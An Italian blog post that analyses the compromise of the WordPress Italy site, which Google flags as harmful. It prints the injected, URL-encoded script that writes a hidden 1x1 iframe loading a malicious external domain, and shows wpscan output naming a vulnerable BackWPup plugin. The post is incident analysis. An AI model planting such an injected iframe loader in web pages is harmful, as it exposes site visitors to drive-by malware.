Questa mattina mi sono accorto per caso che nelle SERP di Google il sito www.wordpress-it.it, cioè WordPress Italy, risulta segnalato come sito infetto. Ecco la SERP di Google con evidenziato il messaggio “Questo sito potrebbe arrecare danni al tuo computer”:
Andando ad analizzare il sorgente del sito con Malzilla, utile per scaricare in modo sicuro il sito senza navigarci, appare chiaro come il problema risieda in un iframe che reindirizza al dominio vosstaniecorpov.com. Questo è l’iframe iniettato su WordPress Italy:
enc = "%3Ciframe%20src%3D%27http%3A//vosstaniecorpov.com/in.php%27%20width%3D%271%27%20height%3D%271%27%20frameborder%3D%270%27%3E%3C/iframe%3E"; dec = unescape(enc); document.write(dec);
Con una macchina virtuale ho navigato il sito con Firefox (6.0.2) e vengono effettuate anche delle chiamate a http://daitetrafu.com, segnalato anch’esso come sito malevolo (anche se stranamente non da VirusTotal ma solo dalla funzione di riconoscimento siti nocivi di Firefox e di Chrome) come si vede in figura:
Difficile capire al momento quale sia la falla che è stata sfruttata dagli attaccanti, probabile ci sia una vulnerabilità nel tema usato da WordPress Italy oppure in qualche plugin dato che la versione di WordPress utilizzata è la 3.3 leggendo il file http://www.wordpress-it.it/readme.html.
Ecco una veloce scansione con wpscan cosa riporta:
<code>
[+] We found 1 potentially vulnerable plugins:
Name: backwpup
Location: http://www.wordpress-it.it/wp-content/plugins/bac…
Directory listing enabled? Yes.
[+] There were 1 vulnerabilities identified from the plugin names:
[!] WordPress plugin BackWPup 1.5.2, 1.6.1, 1.7.1 Remote and Local Code Execution Vulnerability
* Reference: http://osvdb.org/show/osvdb/71481
</code>